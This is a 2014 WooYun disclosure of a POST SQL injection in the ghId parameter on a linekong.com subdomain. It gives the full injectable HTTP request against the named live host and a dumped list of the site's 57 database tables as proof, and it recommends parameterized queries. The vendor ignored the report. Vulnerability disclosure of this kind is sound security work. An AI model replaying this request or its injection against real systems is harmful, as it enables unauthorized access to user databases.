当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078554

漏洞标题:蓝港某分站POST注入一枚

相关厂商:linekong.com

漏洞作者: Eoh

提交时间:2014-10-10 14:50

修复时间:2014-10-15 14:52

公开时间:2014-10-15 14:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-10: 细节已通知厂商并且等待厂商处理中
2014-10-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

未对用户输入正确执行危险字符清理

详细说明:

存在问题参数ghId
POST /activity/clan3/_do_getPlayerList.ajax.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ms.linekong.com
Cookie: PHPSESSID=oon708apra935clk8l8a78cck0
Host: ms.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ghId=*&page=1


漏洞证明:

sqli_banner.jpg


Database: ms_web                                                                                                                                                                                                  
[57 tables]
+---------------------------------------+
| ms_activity_17173 |
| ms_activity_aprilpromotion_gift |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register |
| ms_activity_clan2_gh |
| ms_activity_clan2_join_log |
| ms_activity_clan3_gh |
| ms_activity_clan3_join_log |
| ms_activity_clan3_survey |
| ms_activity_clan_gh |
| ms_activity_clan_join_log |
| ms_activity_gh_member |
| ms_activity_jh_lottery |
| ms_activity_jh_survey |
| ms_activity_laborday |
| ms_activity_name2_log |
| ms_activity_name3_log |
| ms_activity_name_log |
| ms_activity_signin_log |
| ms_activity_spread |
| ms_activity_spread_log |
| ms_activity_surveyjh_code |
| ms_activity_surveyjh_log |
| ms_activity_surveyjh_option |
| ms_activity_surveyjh_votes |
| ms_activity_voting_log |
| ms_address |
| ms_article |
| ms_article_inserl |
| ms_build |
| ms_channel |
| ms_columns |
| ms_comment |
| ms_download |
| ms_editors_inserl |
| ms_flash |
| ms_grading |
| ms_group |
| ms_image |
| ms_image_inserl |
| ms_lottery_YYexchange |
| ms_lottery_exchange |
| ms_member |
| ms_pass_card_list |
| ms_pass_card_list_log |
| ms_passportstat |
| ms_sort |
| ms_template |
| ms_url |
| ms_url_inserl |
| ms_vote |
| ms_vote_inserl |
| ms_vote_option |
| ms_wj_article |
| ms_wj_article_inserl |
| ms_wj_image |
| ms_wj_image_inserl |
+---------------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-15 14:52

厂商回复:

最新状态:

暂无